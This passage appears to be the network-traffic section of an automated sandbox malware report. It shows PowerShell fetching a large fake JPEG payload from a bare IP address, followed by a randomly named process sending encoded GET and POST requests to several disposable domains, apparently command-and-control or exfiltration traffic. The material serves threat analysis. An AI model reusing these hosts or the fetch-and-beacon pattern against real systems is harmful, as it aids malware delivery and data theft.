                                                                                        Nov 14, 2024 08:17:38.020917892 CET6350280192.168.2.5161.97.142.144
                                                                                        Nov 14, 2024 08:17:38.022357941 CET6350280192.168.2.5161.97.142.144
                                                                                        Nov 14, 2024 08:17:38.027234077 CET8063502161.97.142.144192.168.2.5

                                                                                        UDP Packets

                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                        Nov 14, 2024 08:15:39.503536940 CET6532653192.168.2.51.1.1.1
                                                                                        Nov 14, 2024 08:15:39.510452032 CET53653261.1.1.1192.168.2.5
                                                                                        Nov 14, 2024 08:16:07.990076065 CET5363795162.159.36.2192.168.2.5
                                                                                        Nov 14, 2024 08:16:08.669564962 CET6305153192.168.2.51.1.1.1
                                                                                        Nov 14, 2024 08:16:08.677387953 CET53630511.1.1.1192.168.2.5
                                                                                        Nov 14, 2024 08:16:21.368110895 CET5611153192.168.2.51.1.1.1
                                                                                        Nov 14, 2024 08:16:21.709475994 CET53561111.1.1.1192.168.2.5
                                                                                        Nov 14, 2024 08:16:37.408540010 CET5259153192.168.2.51.1.1.1
                                                                                        Nov 14, 2024 08:16:37.453332901 CET53525911.1.1.1192.168.2.5
                                                                                        Nov 14, 2024 08:16:45.517283916 CET6396353192.168.2.51.1.1.1
                                                                                        Nov 14, 2024 08:16:45.870300055 CET53639631.1.1.1192.168.2.5
                                                                                        Nov 14, 2024 08:16:59.675256968 CET4936953192.168.2.51.1.1.1
                                                                                        Nov 14, 2024 08:17:00.672022104 CET4936953192.168.2.51.1.1.1
                                                                                        Nov 14, 2024 08:17:01.035545111 CET53493691.1.1.1192.168.2.5
                                                                                        Nov 14, 2024 08:17:01.035644054 CET53493691.1.1.1192.168.2.5
                                                                                        Nov 14, 2024 08:17:14.830871105 CET6194053192.168.2.51.1.1.1
                                                                                        Nov 14, 2024 08:17:15.827213049 CET6194053192.168.2.51.1.1.1
                                                                                        Nov 14, 2024 08:17:15.850594997 CET53619401.1.1.1192.168.2.5
                                                                                        Nov 14, 2024 08:17:15.850665092 CET53619401.1.1.1192.168.2.5
                                                                                        Nov 14, 2024 08:17:29.315749884 CET5220853192.168.2.51.1.1.1
                                                                                        Nov 14, 2024 08:17:29.375147104 CET53522081.1.1.1192.168.2.5
                                                                                        Nov 14, 2024 08:17:43.471946001 CET5987153192.168.2.51.1.1.1
                                                                                        Nov 14, 2024 08:17:44.107367992 CET53598711.1.1.1192.168.2.5

                                                                                        DNS Queries

                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                        Nov 14, 2024 08:15:39.503536940 CET192.168.2.51.1.1.10xb738Standard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)false
                                                                                        Nov 14, 2024 08:16:08.669564962 CET192.168.2.51.1.1.10xba74Standard query (0)241.42.69.40.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                                                        Nov 14, 2024 08:16:21.368110895 CET192.168.2.51.1.1.10xdb18Standard query (0)www.bcg.servicesA (IP address)IN (0x0001)false
                                                                                        Nov 14, 2024 08:16:37.408540010 CET192.168.2.51.1.1.10x1269Standard query (0)www.alihones.lolA (IP address)IN (0x0001)false
                                                                                        Nov 14, 2024 08:16:45.517283916 CET192.168.2.51.1.1.10xe197Standard query (0)www.5tuohbpzyj9.buzzA (IP address)IN (0x0001)false
                                                                                        Nov 14, 2024 08:16:59.675256968 CET192.168.2.51.1.1.10x539eStandard query (0)www.yc791022.asiaA (IP address)IN (0x0001)false
                                                                                        Nov 14, 2024 08:17:00.672022104 CET192.168.2.51.1.1.10x539eStandard query (0)www.yc791022.asiaA (IP address)IN (0x0001)false
                                                                                        Nov 14, 2024 08:17:14.830871105 CET192.168.2.51.1.1.10x3cfeStandard query (0)www.nimil.infoA (IP address)IN (0x0001)false
                                                                                        Nov 14, 2024 08:17:15.827213049 CET192.168.2.51.1.1.10x3cfeStandard query (0)www.nimil.infoA (IP address)IN (0x0001)false
                                                                                        Nov 14, 2024 08:17:29.315749884 CET192.168.2.51.1.1.10x5464Standard query (0)www.030002350.xyzA (IP address)IN (0x0001)false
                                                                                        Nov 14, 2024 08:17:43.471946001 CET192.168.2.51.1.1.10x7111Standard query (0)www.nuy25c9t.sbsA (IP address)IN (0x0001)false

                                                                                        DNS Answers

                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                        Nov 14, 2024 08:15:39.510452032 CET1.1.1.1192.168.2.50xb738No error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                                                                                        Nov 14, 2024 08:15:39.510452032 CET1.1.1.1192.168.2.50xb738No error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                                                                        Nov 14, 2024 08:15:39.510452032 CET1.1.1.1192.168.2.50xb738No error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                                                                        Nov 14, 2024 08:15:39.510452032 CET1.1.1.1192.168.2.50xb738No error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                                                                                        Nov 14, 2024 08:16:08.677387953 CET1.1.1.1192.168.2.50xba74Name error (3)241.42.69.40.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                                                                        Nov 14, 2024 08:16:21.709475994 CET1.1.1.1192.168.2.50xdb18No error (0)www.bcg.services199.59.243.227A (IP address)IN (0x0001)false
                                                                                        Nov 14, 2024 08:16:37.453332901 CET1.1.1.1192.168.2.50x1269Name error (3)www.alihones.lolnonenoneA (IP address)IN (0x0001)false
                                                                                        Nov 14, 2024 08:16:45.870300055 CET1.1.1.1192.168.2.50xe197No error (0)www.5tuohbpzyj9.buzz156.232.181.155A (IP address)IN (0x0001)false
                                                                                        Nov 14, 2024 08:17:01.035545111 CET1.1.1.1192.168.2.50x539eNo error (0)www.yc791022.asia101.35.209.183A (IP address)IN (0x0001)false
                                                                                        Nov 14, 2024 08:17:01.035644054 CET1.1.1.1192.168.2.50x539eNo error (0)www.yc791022.asia101.35.209.183A (IP address)IN (0x0001)false
                                                                                        Nov 14, 2024 08:17:15.850594997 CET1.1.1.1192.168.2.50x3cfeNo error (0)www.nimil.info203.161.46.205A (IP address)IN (0x0001)false
                                                                                        Nov 14, 2024 08:17:15.850665092 CET1.1.1.1192.168.2.50x3cfeNo error (0)www.nimil.info203.161.46.205A (IP address)IN (0x0001)false
                                                                                        Nov 14, 2024 08:17:29.375147104 CET1.1.1.1192.168.2.50x5464No error (0)www.030002350.xyz161.97.142.144A (IP address)IN (0x0001)false
                                                                                        Nov 14, 2024 08:17:44.107367992 CET1.1.1.1192.168.2.50x7111No error (0)www.nuy25c9t.sbsb1-3-r11-gmhudx.t9d2quy5.shopCNAME (Canonical name)IN (0x0001)false
                                                                                        Nov 14, 2024 08:17:44.107367992 CET1.1.1.1192.168.2.50x7111No error (0)b1-3-r11-gmhudx.t9d2quy5.shopb1-3-r11.t9d2quy5.shopCNAME (Canonical name)IN (0x0001)false
                                                                                        Nov 14, 2024 08:17:44.107367992 CET1.1.1.1192.168.2.50x7111No error (0)b1-3-r11.t9d2quy5.shopb1-3-r111-s65psj.8uqm5xgy.shopCNAME (Canonical name)IN (0x0001)false
                                                                                        Nov 14, 2024 08:17:44.107367992 CET1.1.1.1192.168.2.50x7111No error (0)b1-3-r111-s65psj.8uqm5xgy.shopb1-3-r11-nff52.alicloudddos.topCNAME (Canonical name)IN (0x0001)false
                                                                                        Nov 14, 2024 08:17:44.107367992 CET1.1.1.1192.168.2.50x7111No error (0)b1-3-r11-nff52.alicloudddos.topb1-3-r111-s65psj.alicloudddos.topCNAME (Canonical name)IN (0x0001)false
                                                                                        Nov 14, 2024 08:17:44.107367992 CET1.1.1.1192.168.2.50x7111No error (0)b1-3-r111-s65psj.alicloudddos.topb1-3-r111-55g56.kunlundns.topCNAME (Canonical name)IN (0x0001)false
                                                                                        Nov 14, 2024 08:17:44.107367992 CET1.1.1.1192.168.2.50x7111No error (0)b1-3-r111-55g56.kunlundns.topb1-3-r111.kunlundns.topCNAME (Canonical name)IN (0x0001)false
                                                                                        Nov 14, 2024 08:17:44.107367992 CET1.1.1.1192.168.2.50x7111No error (0)b1-3-r111.kunlundns.top43.155.76.124A (IP address)IN (0x0001)false

                                                                                        HTTP Request Dependency Graph

                                                                                        • raw.githubusercontent.com
                                                                                        • 103.20.102.62
                                                                                        • www.bcg.services
                                                                                        • www.5tuohbpzyj9.buzz
                                                                                        • www.yc791022.asia
                                                                                        • www.nimil.info
                                                                                        • www.030002350.xyz

                                                                                        HTTP Packets

                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        0192.168.2.549704103.20.102.62803292C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 14, 2024 08:15:33.773324013 CET74OUTGET /new_img.jpg HTTP/1.1
                                                                                        Host: 103.20.102.62
                                                                                        Connection: Keep-Alive
                                                                                        Nov 14, 2024 08:15:34.783651114 CET1236INHTTP/1.1 200 OK
                                                                                        Date: Thu, 14 Nov 2024 07:15:34 GMT
                                                                                        Server: Apache/2.4.37 (centos)
                                                                                        Last-Modified: Tue, 12 Nov 2024 13:23:05 GMT
                                                                                        ETag: "323a57-626b71e086040"
                                                                                        Accept-Ranges: bytes
                                                                                        Content-Length: 3291735
                                                                                        Keep-Alive: timeout=5, max=100
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: image/jpeg
                                                                                        Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 02 01 00 48 00 48 00 00 ff e2 0c 58 49 43 43 5f 50 52 4f 46 49 4c 45 00 01 01 00 00 0c 48 4c 69 6e 6f 02 10 00 00 6d 6e 74 72 52 47 42 20 58 59 5a 20 07 ce 00 02 00 09 00 06 00 31 00 00 61 63 73 70 4d 53 46 54 00 00 00 00 49 45 43 20 73 52 47 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f6 d6 00 01 00 00 00 00 d3 2d 48 50 20 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 11 63 70 72 74 00 00 01 50 00 00 00 33 64 65 73 63 00 00 01 84 00 00 00 6c 77 74 70 74 00 00 01 f0 00 00 00 14 62 6b 70 74 00 00 02 04 00 00 00 14 72 58 59 5a 00 00 02 18 00 00 00 14 67 58 59 5a 00 00 02 2c 00 00 00 14 62 58 59 5a 00 00 02 40 00 00 00 14 64 6d 6e 64 00 00 02 54 00 00 00 70 64 6d 64 64 00 00 02 c4 00 00 00 88 76 75 65 64 00 00 03 4c 00 00 00 86 76 69 65 77 00 00 03 d4 00 00 00 24 6c 75 6d 69 00 00 03 f8 00 00 00 14 6d 65 61 73 00 00 04 0c 00 00 00 24 74 65 63 68 00 00 04 30 00 00 00 0c [TRUNCATED]
                                                                                        Data Ascii: JFIFHHXICC_PROFILEHLinomntrRGB XYZ 1acspMSFTIEC sRGB-HP cprtP3desclwtptbkptrXYZgXYZ,bXYZ@dmndTpdmddvuedLview$lumimeas$tech0rTRC<gTRC<bTRC<textCopyright (c) 1998 Hewlett-Packard CompanydescsRGB IEC61966-2.1sRGB IEC61966-2.1XYZ QXYZ XYZ o8XYZ bXYZ $descIEC http://www.iec.chIEC http://www.iec.chdesc.IEC 61966-2.1 Default RGB colour space - sRGB.IEC 61966-2.1 Default RGB colour space - sRGBdesc,Reference Viewing Condition in IEC61966-2.1
                                                                                        Nov 14, 2024 08:15:34.783708096 CET1236INData Raw: 00 00 00 00 00 2c 52 65 66 65 72 65 6e 63 65 20 56 69 65 77 69 6e 67 20 43 6f 6e 64 69 74 69 6f 6e 20 69 6e 20 49 45 43 36 31 39 36 36 2d 32 2e 31 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 76 69 65 77 00 00 00
                                                                                        Data Ascii: ,Reference Viewing Condition in IEC61966-2.1view_.\XYZ LVPWmeassig CRT curv#(-27;@EJOTY^chmrw|
                                                                                        Nov 14, 2024 08:15:34.783725977 CET1236INData Raw: 42 39 7f 39 bc 39 f9 3a 36 3a 74 3a b2 3a ef 3b 2d 3b 6b 3b aa 3b e8 3c 27 3c 65 3c a4 3c e3 3d 22 3d 61 3d a1 3d e0 3e 20 3e 60 3e a0 3e e0 3f 21 3f 61 3f a2 3f e2 40 23 40 64 40 a6 40 e7 41 29 41 6a 41 ac 41 ee 42 30 42 72 42 b5 42 f7 43 3a 43
                                                                                        Data Ascii: B999:6:t::;-;k;;<'<e<<="=a==> >`>>?!?a??@#@d@@A)AjAAB0BrBBC:C}CDDGDDEEUEEF"FgFFG5G{GHHKHHIIcIIJ7J}JKKSKKL*LrLMMJMMN%NnNOOIOOP'PqPQQPQQR1R|RSS_SSTBTTU(UuUVV\VVWDWWX/X}XYYiYZZV
                                                                                        Nov 14, 2024 08:15:34.783761024 CET636INData Raw: 43 9b 22 44 5a 09 12 22 80 d7 97 2a 01 52 04 91 48 50 d4 48 8b 82 86 91 45 20 00 42 24 9c 31 c9 ca 1c 90 9a 48 d4 40 08 22 70 20 12 08 08 a1 a5 c0 0e 04 40 a5 4d 7b 40 51 46 a7 00 10 11 39 a5 48 20 2c 26 80 73 88 de d2 26 4a d1 8d 91 0c 73 82 30
                                                                                        Data Ascii: C"DZ"*RHPHE B$1H@"p @M{@QF9H ,&s&Js0Jk\Ar'&@(xQsBk^!k l$Mp].CA@e<&L02H1JEB08jPF&EwHbsi(K^T1#sOP'0=SBN4AD*HQsP5)z@
                                                                                        Nov 14, 2024 08:15:34.783778906 CET1236INData Raw: d0 82 48 dc 50 11 72 80 4c a1 10 a5 27 00 a4 12 92 24 90 9c 12 82 10 50 01 21 05 24 10 50 92 01 21 05 20 16 94 20 55 85 34 a1 4d 41 2d 2a 48 50 13 82 94 88 81 40 09 4a e0 08 88 22 69 6d 89 02 46 d7 00 24 42 42 12 4d 1c 08 13 5e 2c 60 90 14 9e d9
                                                                                        Data Ascii: HPrL'$P!$P! U4MA-*HP@J"imF$BBM^,`35@'I'p'5ZihCJkp.J $z`$kH!IRs@0ID/UeEEs$H9 (S4EM@H!CA6=MF$j1
                                                                                        Nov 14, 2024 08:15:34.783807039 CET1236INData Raw: c9 02 70 50 d7 a4 61 45 1a 1e 86 07 a4 88 48 ac 8d 48 e4 85 d2 25 61 7a 9a 49 11 31 e0 6a 42 98 e4 59 6b c3 d5 22 a5 28 16 81 49 10 28 6b 5e cb 00 29 13 81 54 09 1a 88 44 0a 12 46 93 4b 51 38 24 20 80 a4 94 14 46 92 80 8a 10 25 58 9c a1 a9 e8 01
                                                                                        Data Ascii: pPaEHH%azI1jBYk"(I(k^)TDFKQ8$ F%X8&)!%!!$$Z5DDZ*$x )AOW5!\PFU$@`"@jW5 $YI $ BHH$F,%)%rJAMJJ0I$IjHA{)
                                                                                        Nov 14, 2024 08:15:34.783843040 CET424INData Raw: 49 02 28 48 81 38 20 a0 55 38 39 42 48 24 16 93 9a 95 e2 37 2a 40 a1 00 a1 01 21 49 aa f0 d2 14 9a 8e 00 88 b4 89 d1 91 c9 a5 49 8d c3 da 80 8b 5c 16 90 22 92 00 0a 24 50 8a 0a 03 9a 85 31 c3 92 4a 8b 50 e0 0a a2 1c 02 1b 6b 92 30 92 14 9f 13 f2
                                                                                        Data Ascii: I(H8 U89BH$7*@!II\"$P1JPk0z>i%#Pj*cTH(by#/1ODiBq@H@! @!KH!rDNjRA*rR!JA ,A$@H @&Hl&(1ADI!$@
                                                                                        Nov 14, 2024 08:15:34.783876896 CET1236INData Raw: 15 ae 0e 32 35 16 5a 88 42 20 23 90 20 49 ab 21 62 1c 9a f1 a9 34 73 51 44 91 03 49 01 00 70 0e 00 24 09 38 6a 2d 08 44 41 f1 a1 72 2a d7 02 35 c9 00 39 a8 82 48 9a f0 31 e9 a1 21 53 d8 9a 48 d4 a1 16 ba 98 f6 a6 4b 49 50 83 87 35 36 52 88 0b 5a
                                                                                        Data Ascii: 25ZB # I!b4sQDIp$8j-DAr*59H1!SHKIP56RZG6\9<s"jH Q!pshBqIB4iIPxV(X4.JHP#eMBj'$.jC)z i@D6*JFYrahi$E!
                                                                                        Nov 14, 2024 08:15:34.783914089 CET1236INData Raw: 40 92 28 11 79 19 7a 56 27 a1 a5 c0 4e 04 48 28 28 25 24 21 24 82 81 02 49 0a 02 88 20 48 20 96 90 a0 44 81 12 44 40 81 24 80 0a 12 08 29 21 02 02 12 12 48 49 21 14 04 41 02 48 0c 91 82 48 04 23 60 28 c0 21 2a 48 80 24 20 52 07 03 80 04 88 24 20
                                                                                        Data Ascii: @(yzV'NH((%$!$I H DD@$)!HI!AHH#`(!*H$ R$ H6TD '@r!Sdb(ID"$2j9#@kJapSA(kA Nc@A5HMqF5,Q.!XqNUQhQRHc2<,!*H$Pp
                                                                                        Nov 14, 2024 08:15:34.783950090 CET424INData Raw: 44 04 04 55 80 15 29 09 58 93 4a 12 d4 39 30 c3 82 2a 9c 0a a0 88 11 00 69 42 09 5c a4 02 48 98 47 a8 ca bd 46 89 1a d4 8e 04 09 14 24 1a 8e 4d 34 81 4c 82 90 01 68 e6 a3 40 38 21 21 f2 b5 af 44 65 ec 44 89 50 12 b1 c9 3e 6d 04 73 b4 d7 05 40 b4
                                                                                        Data Ascii: DU)XJ90*iB\HGF$M4Lh@8!!DeDP>ms@jHjxe$ D @PRp!"HBH!$DiTD!!$G DiHI Z@PHI9qpEHFH4H$JFF@) -I*BBj4
                                                                                        Nov 14, 2024 08:15:34.788868904 CET1236INData Raw: 20 73 4a a7 03 29 7c 45 a7 96 10 a6 a1 ce 61 8b 52 55 9e 6e 40 14 10 c8 d2 65 13 89 10 60 61 91 95 12 78 b9 62 72 a0 0a 84 1c 04 0a 01 45 53 da e5 24 3a 23 48 53 cc 6e 89 1f 0b c7 a4 d8 0d 78 a6 a2 86 27 11 8e 4e 1a 1c 84 81 0a 04 48 00 a0 84 93
                                                                                        Data Ascii: sJ)|EaRUn@e`axbrES$:#HSnx'NHG049EN@(<\ H,a.Fej$k$DfDOJ5<TI#@cJ5HjN`(j5H\I$Z+OjCMJ"jGI@A$HyiRH @I5IRHI U


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1192.168.2.563422199.59.243.227803720C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 14, 2024 08:16:21.732917070 CET511OUTGET /f3nk/?X8wps=HD9ptle8L&qb6h=v6+LTBEbPC2R85sFOmmbFC2Q/XGqyVy+lLBawY5mHj8QlUcwrm67JADjHek/seltQEUToGC/qYQit/V96/0oCLxc35by5p8gg2oFcQQLjMbf4RKBZtC51re3Q6vWyy22Hg== HTTP/1.1
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                        Accept-Language: en-US,en;q=0.5
                                                                                        Host: www.bcg.services
                                                                                        Connection: close
                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; Nexus 5 Build/LRX22C) AppleWebKit / 537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
                                                                                        Nov 14, 2024 08:16:22.358198881 CET1236INHTTP/1.1 200 OK
                                                                                        date: Thu, 14 Nov 2024 07:16:22 GMT
                                                                                        content-type: text/html; charset=utf-8
                                                                                        content-length: 1502
                                                                                        x-request-id: 7d64832a-94e2-4686-a790-0ea942216563
                                                                                        cache-control: no-store, max-age=0
                                                                                        accept-ch: sec-ch-prefers-color-scheme
                                                                                        critical-ch: sec-ch-prefers-color-scheme
                                                                                        vary: sec-ch-prefers-color-scheme
                                                                                        x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_lJq1bB76E+snwTuRzAQCRTwlHc49zybzlJtRoKPWuKRmkmMWfCsJStswr2UyCHlVmPCMJKPmz7TkvPqFEfwvQA==
                                                                                        set-cookie: parking_session=7d64832a-94e2-4686-a790-0ea942216563; expires=Thu, 14 Nov 2024 07:31:22 GMT; path=/
                                                                                        connection: close
                                                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 6c 4a 71 31 62 42 37 36 45 2b 73 6e 77 54 75 52 7a 41 51 43 52 54 77 6c 48 63 34 39 7a 79 62 7a 6c 4a 74 52 6f 4b 50 57 75 4b 52 6d 6b 6d 4d 57 66 43 73 4a 53 74 73 77 72 32 55 79 43 48 6c 56 6d 50 43 4d 4a 4b 50 6d 7a 37 54 6b 76 50 71 46 45 66 77 76 51 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                        Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_lJq1bB76E+snwTuRzAQCRTwlHc49zybzlJtRoKPWuKRmkmMWfCsJStswr2UyCHlVmPCMJKPmz7TkvPqFEfwvQA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                        Nov 14, 2024 08:16:22.358408928 CET955INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                        Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiN2Q2NDgzMmEtOTRlMi00Njg2LWE3OTAtMGVhOTQyMjE2NTYzIiwicGFnZV90aW1lIjoxNzMxNTY4NT


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        2192.168.2.563487156.232.181.155803720C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 14, 2024 08:16:45.898580074 CET779OUTPOST /c6yl/ HTTP/1.1
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                        Accept-Language: en-US,en;q=0.5
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Host: www.5tuohbpzyj9.buzz
                                                                                        Cache-Control: no-cache
                                                                                        Connection: close
                                                                                        Content-Length: 205
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Origin: http://www.5tuohbpzyj9.buzz
                                                                                        Referer: http://www.5tuohbpzyj9.buzz/c6yl/
                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; Nexus 5 Build/LRX22C) AppleWebKit / 537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
                                                                                        Data Raw: 71 62 36 68 3d 64 43 61 45 73 6c 54 56 51 6a 5a 38 72 65 70 77 78 4b 59 59 35 4b 30 34 66 58 72 62 6c 6b 30 4f 57 71 35 7a 5a 65 58 4e 73 64 4c 7a 31 2f 32 71 76 4f 77 6e 74 76 34 53 43 53 51 64 78 59 6d 7a 31 65 73 6e 44 67 76 55 64 65 52 7a 79 68 70 41 73 5a 2f 36 74 52 6b 75 66 61 58 6e 78 76 68 71 66 68 41 53 39 58 46 4c 37 78 52 51 30 63 72 6a 6f 64 6a 54 47 5a 30 44 2b 6a 32 31 31 31 38 58 5a 50 50 34 77 52 64 79 36 71 78 58 6f 44 57 37 44 64 42 73 36 4e 34 6b 57 30 48 74 68 48 39 66 55 66 63 34 46 43 6c 52 57 70 61 39 38 31 58 4b 52 73 4f 64 71 62 7a 65 42 56 38 2f 56 76 58 31 55 6b 41 44 33 46 63 3d
                                                                                        Data Ascii: qb6h=dCaEslTVQjZ8repwxKYY5K04fXrblk0OWq5zZeXNsdLz1/2qvOwntv4SCSQdxYmz1esnDgvUdeRzyhpAsZ/6tRkufaXnxvhqfhAS9XFL7xRQ0crjodjTGZ0D+j21118XZPP4wRdy6qxXoDW7DdBs6N4kW0HthH9fUfc4FClRWpa981XKRsOdqbzeBV8/VvX1UkAD3Fc=


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        3192.168.2.563488156.232.181.155803720C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 14, 2024 08:16:48.443821907 CET799OUTPOST /c6yl/ HTTP/1.1
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                        Accept-Language: en-US,en;q=0.5
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Host: www.5tuohbpzyj9.buzz
                                                                                        Cache-Control: no-cache
                                                                                        Connection: close
                                                                                        Content-Length: 225
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Origin: http://www.5tuohbpzyj9.buzz
                                                                                        Referer: http://www.5tuohbpzyj9.buzz/c6yl/
                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; Nexus 5 Build/LRX22C) AppleWebKit / 537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
                                                                                        Data Raw: 71 62 36 68 3d 64 43 61 45 73 6c 54 56 51 6a 5a 38 35 72 35 77 79 70 41 59 6f 71 30 2f 54 33 72 62 33 6b 31 48 57 71 39 7a 5a 63 37 64 74 76 2f 7a 31 66 47 71 75 50 77 6e 75 76 34 53 57 69 51 63 76 6f 6d 6f 31 66 51 76 44 6c 58 55 64 65 46 7a 79 68 35 41 73 71 58 35 75 68 6b 57 4b 4b 58 70 76 66 68 71 66 68 41 53 39 58 68 78 37 78 5a 51 30 74 37 6a 6f 2b 37 51 4f 35 30 45 35 6a 32 31 6a 31 38 54 5a 50 4f 64 77 53 5a 59 36 6f 35 58 6f 43 6d 37 44 73 42 76 31 4e 34 71 53 30 47 6b 78 69 59 44 55 2b 67 30 45 67 73 32 58 4a 69 65 77 6a 6d 67 4c 4f 47 31 35 37 66 6d 52 47 30 49 45 66 32 63 4f 48 51 7a 70 53 4a 55 61 72 30 77 46 67 42 68 4e 49 4a 30 67 44 6f 53 6d 73 67 76
                                                                                        Data Ascii: qb6h=dCaEslTVQjZ85r5wypAYoq0/T3rb3k1HWq9zZc7dtv/z1fGquPwnuv4SWiQcvomo1fQvDlXUdeFzyh5AsqX5uhkWKKXpvfhqfhAS9Xhx7xZQ0t7jo+7QO50E5j21j18TZPOdwSZY6o5XoCm7DsBv1N4qS0GkxiYDU+g0Egs2XJiewjmgLOG157fmRG0IEf2cOHQzpSJUar0wFgBhNIJ0gDoSmsgv


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        4192.168.2.563489156.232.181.155803720C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Nov 14, 2024 08:16:50.989842892 CET1816OUTPOST /c6yl/ HTTP/1.1
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                        Accept-Language: en-US,en;q=0.5
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Host: www.5tuohbpzyj9.buzz
                                                                                        Cache-Control: no-cache
                                                                                        Connection: close
                                                                                        Content-Length: 1241
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Origin: http://www.5tuohbpzyj9.buzz
                                                                                        Referer: http://www.5tuohbpzyj9.buzz/c6yl/
